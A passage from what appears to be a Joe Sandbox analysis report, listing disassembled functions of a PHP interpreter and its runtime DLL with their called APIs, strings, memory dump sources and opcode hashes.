                                                • Instruction Fuzzy Hash: 69114C72909B82C2DB50AF29E44426DB3B5FB88B68F548231CB5C477A4DF3CD426C710
                                                Function 00007FFE1A524288 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A524407
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort
                                                • String ID: $csm$csm
                                                • API String ID: 4206212132-1512788406
                                                • Opcode ID: 041b58f3de5196c69b124c2ba61789f4a272a12b531fce9fd61be4661d159c18
                                                • Instruction ID: e131e47c3105762f402f4c8cca640c0007f02f04ee89c16096f28950b2bf471c
                                                • Opcode Fuzzy Hash: 041b58f3de5196c69b124c2ba61789f4a272a12b531fce9fd61be4661d159c18
                                                • Instruction Fuzzy Hash: 76719132B0CA91C6DB248B66D0406797BB2FB46FA8F1481B7DB4D07AA6CE3CD491C741
                                                Function 00007FFE1A524060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A524157
                                                • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A524167
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                • String ID: csm$csm
                                                • API String ID: 4108983575-3733052814
                                                • Opcode ID: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
                                                • Instruction ID: 01f00cbdd2e96c5dc22835de0b2a9b11443cb755bb93816485c8e30e3db2c61c
                                                • Opcode Fuzzy Hash: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
                                                • Instruction Fuzzy Hash: 67514336A0CB81C6EB648B9394442787AB1FB56FA5F1441B7DA5D47BA6CF3CE450C700
                                                Function 00007FFE1A52F040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind
                                                • String ID: csm$f
                                                • API String ID: 451473138-629598281
                                                • Opcode ID: 85b5fcb7b97597723a806be8e626fa0e1197ae9fcad6cd090af730aec85bac0a
                                                • Instruction ID: 51cf67a508c0f687b9c14d61e04168c8aa5cf26da446a82609360518e5b4d4ff
                                                • Opcode Fuzzy Hash: 85b5fcb7b97597723a806be8e626fa0e1197ae9fcad6cd090af730aec85bac0a
                                                • Instruction Fuzzy Hash: CC519036B0DA02C6DB14CB52F844A7937A6FB42FA4F5081B7E91A47798DF38E859C700
                                                Function 00007FFE1A52AAF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::
                                                • String ID: %lf
                                                • API String ID: 1333004437-2891890143
                                                • Opcode ID: 5a7c290a84f6e8b1167a4a77f7bfc329acb267dd37a995d028402671466fb2be
                                                • Instruction ID: 8362a7af393aecc0a07014876546a2d089af3210276f0f3ef990b6dd0a1baf68
                                                • Opcode Fuzzy Hash: 5a7c290a84f6e8b1167a4a77f7bfc329acb267dd37a995d028402671466fb2be
                                                • Instruction Fuzzy Hash: 3E318461B0CF8685E621DB63A8500BA7352BF96F90F4442F7EA5E57761DF3CE1458700
                                                Function 00007FFE1A522630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A52266E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abortterminate
                                                • String ID: MOC$RCC$csm
                                                • API String ID: 661698970-2671469338
                                                • Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                • Instruction ID: dc8e78d18b2e4cf3d7c002367786d40bbaf32d30f400703c050a486d2138a6e8
                                                • Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                • Instruction Fuzzy Hash: 55F03C37A1CA46C1E7505BA2A18107C3675EB8DFA4F0951F3DB4806666CF3CE4A4CA41
                                                Function 00007FF7498C18B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • php, xrefs: 00007FF7498C18C9
                                                • Usage: %s [options] [-f] <file> [--] [args...] %s [options] -r <code> [--] [args...] %s [options] [-B <begin_code>] -R <code> [-E <end_code>] [--] [args...] %s [options] [-B <begin_code>] -F <file> [-E <end_code>] [--] [args...] %s [options] -S <ad, xrefs: 00007FF7498C18D5
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: printfstrrchr
                                                • String ID: Usage: %s [options] [-f] <file> [--] [args...] %s [options] -r <code> [--] [args...] %s [options] [-B <begin_code>] -R <code> [-E <end_code>] [--] [args...] %s [options] [-B <begin_code>] -F <file> [-E <end_code>] [--] [args...] %s [options] -S <ad$php
                                                • API String ID: 1948539113-3325242880
                                                • Opcode ID: 121f1cea1782dd17d47504f1a1cfa68651a3f2e98723527b3cbf87a56b3da223
                                                • Instruction ID: 15236bd518b9051dc2922ad88d2ff811ede795c27163041bb308c0b454066df2
                                                • Opcode Fuzzy Hash: 121f1cea1782dd17d47504f1a1cfa68651a3f2e98723527b3cbf87a56b3da223
                                                • Instruction Fuzzy Hash: 96E0ED61A1EB46C5E590BF04A880665A2FCFB58780F901534D68E52755EF3CD1219720
                                                Function 00007FF7498C1750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$__stdio_common_vfprintffprintf
                                                • String ID: %s
                                                • API String ID: 3544570504-620797490
                                                • Opcode ID: 02c8263383356b5036572501dc626c23b4efe45565c7bb5f8470967f07cbeff2
                                                • Instruction ID: 904fe2e683834915079829bea417f8747ee9ce4c920cd2669744fa913285864a
                                                • Opcode Fuzzy Hash: 02c8263383356b5036572501dc626c23b4efe45565c7bb5f8470967f07cbeff2
                                                • Instruction Fuzzy Hash: 2CD01250E0D712C2E6047F99A855274D278DB48B90F440438DA1E07366EE1CA0649220
                                                Function 00007FFE1A52A078 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                • Opcode ID: f8e503547d28693e7c2caa01b602f421454b5c59d39c80ab22d5e562bf931295
                                                • Instruction ID: 0c3941092b7332e8d5d4d7ade30f44fb22a37499f3cfb054176c9c2f45d3c1dc
                                                • Opcode Fuzzy Hash: f8e503547d28693e7c2caa01b602f421454b5c59d39c80ab22d5e562bf931295
                                                • Instruction Fuzzy Hash: 29913922F0CE92C9F7118BA6E8403BC37A2BB56B68F5440F7DA4D176A5DF39A845C350
                                                Function 00007FFE1A52A834 Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$NameName::
                                                • String ID:
                                                • API String ID: 168861036-0
                                                • Opcode ID: 096c067aeb964192ba966c7c35baf04cde4b320096b69fd5cc1f53e0d293a66c
                                                • Instruction ID: bc425d24d77947bec742568cfd786106ad2db2a1c2416e6d6604cc63ed54d391
                                                • Opcode Fuzzy Hash: 096c067aeb964192ba966c7c35baf04cde4b320096b69fd5cc1f53e0d293a66c
                                                • Instruction Fuzzy Hash: 16512472B1CE9689E7118FA2E8807BC37A2BB46F64F5484F7DA0D176A5DF39A440C710
                                                Function 00007FFE1A52CC64 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$Replicator::operator[]
                                                • String ID:
                                                • API String ID: 3863519203-0
                                                • Opcode ID: 208b778abe9c40dc360d596873b711c1b4c9531dde43fa8ad9a0283702b0b82e
                                                • Instruction ID: 95b470a8b523420ee0c4f83bda82cae0377226a75a92a909027bdaf2b6576669
                                                • Opcode Fuzzy Hash: 208b778abe9c40dc360d596873b711c1b4c9531dde43fa8ad9a0283702b0b82e
                                                • Instruction Fuzzy Hash: 14418872B08B85C9EB01CFA5D8403BC3BA1BB49BA8F5484B7CA4D5776ADF789441C750
                                                Function 00007FF7498C7EF0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __intrinsic_setjmpphp_execute_scriptzend_destroy_file_handlezend_stream_init_filename
                                                • String ID:
                                                • API String ID: 2175118776-0
                                                • Opcode ID: c5fe6a64716bed694cbfe46c271dfdb9c936309bae4927b79dc7fdd8c38b3652
                                                • Instruction ID: a033a59ea7c203b8e5d9bd63754767f398d64dbc0a16268c7a633b37a0199d44
                                                • Opcode Fuzzy Hash: c5fe6a64716bed694cbfe46c271dfdb9c936309bae4927b79dc7fdd8c38b3652
                                                • Instruction Fuzzy Hash: B5311676618F89C5EB50BF19E4903AAB3B4FB89B94F805232DA4D437A5CF2CD0688710
                                                Function 00007FF7498C44D0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8_emalloc@@8zend_hash_str_find@@24zend_str_tolower_copy@@24
                                                • String ID:
                                                • API String ID: 2076930545-0
                                                • Opcode ID: 353dcdba92b2c6342b4c03f9b13c1d40b008483dd01b58404e1354c18f38e80f
                                                • Instruction ID: 5fcaeaf217e0e46870cf75207fbdd8896094526c769536f0423d873807714e0e
                                                • Opcode Fuzzy Hash: 353dcdba92b2c6342b4c03f9b13c1d40b008483dd01b58404e1354c18f38e80f
                                                • Instruction Fuzzy Hash: 67213322A19B55D5DB10BF2598402A96368FB48BE4FC44631EE2D07BD9DF3CE1A68310
                                                Function 00007FF7498C74C0 Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLastphp_handle_aborted_connectionphp_poll2send
                                                • String ID:
                                                • API String ID: 1866779081-0
                                                • Opcode ID: abf07add748196694ae40f2dc824ed1eb9ea25b80552d8a1dfece6eb73b68d12
                                                • Instruction ID: b91e5fc9aad3f32ed6dc8720714b58261a4b11d9a4b25b96c399814eccb0fbe0
                                                • Opcode Fuzzy Hash: abf07add748196694ae40f2dc824ed1eb9ea25b80552d8a1dfece6eb73b68d12
                                                • Instruction Fuzzy Hash: 5411D322B1CB81C5FB607F2AE84462AE278FB89B94F844034EE4D47B44DF3CE4A59710
                                                Function 00007FF7498C6FB0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                • __zend_realloc.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6EDF,?,?,?,00007FF7498CB8EE), ref: 00007FF7498C6FEC
                                                • __zend_malloc.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6EDF,?,?,?,00007FF7498CB8EE), ref: 00007FF7498C7012
                                                • memmove.VCRUNTIME140(?,?,?,00007FF7498CB8EE), ref: 00007FF7498C7043
                                                • memmove.VCRUNTIME140(?,?,?,00007FF7498CB8EE), ref: 00007FF7498C705D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: memmove$__zend_malloc__zend_realloc
                                                • String ID:
                                                • API String ID: 195525502-0
                                                • Opcode ID: e6e82a00cea3ee3d0e073c8dbcb9d34bc24b8eef3bd3751d0547fbe4a8c80dd7
                                                • Instruction ID: dc9a3605253d11e52cbab220b0f8fb223832501f10e91fac17e7ac347a5ea7a6
                                                • Opcode Fuzzy Hash: e6e82a00cea3ee3d0e073c8dbcb9d34bc24b8eef3bd3751d0547fbe4a8c80dd7
                                                • Instruction Fuzzy Hash: 0E219872608B81C2DB00EF19E400368BBB4F785BB4F948226DF68077C0DB78D0A6C350
                                                Function 00007FFE1A5303BC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
                                                • Instruction ID: f8f71e34a008fe91b8d0bc49efc716ebb96a05d46045c6108992c0fbd44db8b3
                                                • Opcode Fuzzy Hash: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
                                                • Instruction Fuzzy Hash: 24115122B18F018AEB00CF71E8952B933B4FB59B68F040D76DA5D42764DF7CD1588340
                                                Function 00007FF7498C1380 Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$ferrorfwrite
                                                • String ID:
                                                • API String ID: 822410731-0
                                                • Opcode ID: aa0c46da18042519479e706efeca4a93dcabaf0d3885e61b06c3aa308e00c2c0
                                                • Instruction ID: 1d3d9ce62ab8976918e954b80882502f3d2465eabcfb3884e1f94b6b1144cf27
                                                • Opcode Fuzzy Hash: aa0c46da18042519479e706efeca4a93dcabaf0d3885e61b06c3aa308e00c2c0
                                                • Instruction Fuzzy Hash: 57F04420B1D742C1EF15BF6AE954675E274EF48B84F884138CE0E07764EF2DE5948320
                                                Function 00007FFE1A5249B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CreateFrameInfo
                                                • String ID: csm
                                                • API String ID: 2697087660-1018135373
                                                • Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                • Instruction ID: b39c9007b9bd38cecbcb226a3a5adca4bc908ac2632dd901eca98ece41b37c07
                                                • Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                • Instruction Fuzzy Hash: C151187771CA81C6D620AB56A04027E77B5FB8ABA0F1045B6DB8D07B66DF3CE465CB00
                                                Function 00007FFE1A529F64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: void$void
                                                • API String ID: 2943138195-3746155364
                                                • Opcode ID: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
                                                • Instruction ID: 74bea70423ec8fc246bbffd6ed5a28223cce749c91b289e95d8535d3c7701d01
                                                • Opcode Fuzzy Hash: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
                                                • Instruction Fuzzy Hash: FA310462F18E55D8FB11CBA6E8410FC37B1BB49B58F4401B7EA4E62B69DF38A144C750
                                                Function 00007FFE1A5262EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
